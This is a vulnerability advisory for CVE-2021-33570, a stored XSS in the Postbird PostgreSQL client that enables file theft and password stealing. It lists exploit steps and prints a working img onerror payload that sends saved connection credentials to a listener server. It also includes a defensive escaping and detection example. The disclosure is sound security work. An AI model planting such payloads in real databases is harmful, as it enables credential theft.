22 May 2022

[CVE-2021-33570] Postbird 0-day Vulnerability

Postbird is a cross-platform PostgreSQL GUI client built on the Electron framework, widely used by organizations as well as individuals. On 17th May 2021, the Tridentsec team discovered a stored XSS vulnerability in Postbird version 0.8.4.

The vulnerability is critical, and exploiting it can lead to a data breach. We were able to inject malicious JavaScript into the application, which led us to two other vulnerabilities: Local File Inclusion (LFI) and PostgreSQL password stealing.

How can this vulnerability affect your organization?

Every organization maintains databases that contain classified information about its infrastructure, business-related information, credentials, client data, etc.

Using this vulnerability, an attacker can send all of this data to servers under their control. The attacker can also obtain the database credentials, which can be used for a persistent connection to the database, and can steal files located on the Postbird user's computer using the LFI vulnerability.

All these possibilities can create a major threat to an organization’s business reputation and can also lead to more severe cyberattacks.

Vulnerability Exploitation

To exploit the vulnerability, we need to inject a malicious JavaScript payload into any table present in the PostgreSQL database. When the table loads in the Postbird application, the JavaScript code is automatically executed in the background.

In a real scenario, an attacker can plant this JavaScript through a website that saves raw HTML into the database, and then steal files and PostgreSQL credentials.

You can find our Python Proof-of-Concept code and the JavaScript payloads for exploiting the LFI and stealing PostgreSQL credentials on our GitHub repository.

Run our postbird.py Proof-of-Concept code using the command python3 postbird.py before executing any attack.

postbird.py acts as the fake malicious server an attacker would deploy to receive the stolen data.

Steps to exploit the vulnerability:

  1. Open the Postbird application.
  2. Input the payload into any table as data.
  3. Deploy our postbird.py Proof-of-Concept code using the command python3 postbird.py
  4. Reload the table/application to trigger the vulnerability.
  5. Check the data received on the postbird.py server.

Payload for PostgreSQL Password stealing

<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1:5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">


Conclusion

The root cause of all 3 vulnerabilities (Stored XSS, LFI & Insecure Data Storage) is JavaScript injection: the existing code allowed us to store different malicious JavaScript in the database and have it executed. The vulnerability has been patched by blocking the execution of HTML or JavaScript stored in the database.
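One way to apply the kind of fix described above is to treat every cell value as data and encode it before it reaches the renderer. The following is an added example, not Postbird's code or its actual patch; the function names, the audit pattern and the sample rows are constructed for illustration.

```javascript
// Added example: not Postbird's code. All names and rows are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that let a string break out of text into markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored value is concatenated into markup as-is,
// so a tag or event handler saved in a column becomes live DOM when rendered.
function renderRowUnsafe(row) {
  return '<tr>' + row.map((cell) => '<td>' + cell + '</td>').join('') + '</tr>';
}

// Hardened pattern: every cell is treated as data and encoded before output.
function renderRowSafe(row) {
  const cells = row.map((cell) => '<td>' + escapeHtml(cell === null ? 'NULL' : cell) + '</td>');
  return '<tr>' + cells.join('') + '</tr>';
}

// Heuristic audit for values already stored in a table: flags script-capable
// tags, event-handler attributes inside a tag, and javascript: URLs.
// It is a triage aid only; the encoding above is the actual control.
const ACTIVE_MARKUP = /<\s*(script|iframe|object|embed)\b|<[^>]*\son[a-z]+\s*=|javascript:/i;

function findSuspiciousCells(rows) {
  const hits = [];
  rows.forEach((row, r) => row.forEach((cell, c) => {
    if (typeof cell === 'string' && ACTIVE_MARKUP.test(cell)) hits.push({ row: r, col: c });
  }));
  return hits;
}

// Constructed sample rows; the handler body in row 1 is an inert placeholder.
const sampleRows = [
  [1, 'alice', 'Likes <b>bold</b> text'],
  [2, 'bob', '<img src="" onerror="/* script body */">'],
  [3, 'carol', 'a < b && c > d'],
];

console.log(renderRowSafe(sampleRows[1]));
console.log(findSuspiciousCells(sampleRows));
```

In a DOM renderer, assigning the value through textContent instead of innerHTML has the same effect as the encoding shown here.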

References:

  • CVE-2021-33570
  • https://nvd.nist.gov/vuln/detail/CVE-2021-33570
  • https://github.com/Tridentsec-io/postbird
  • https://www.exploit-db.com/exploits/49910
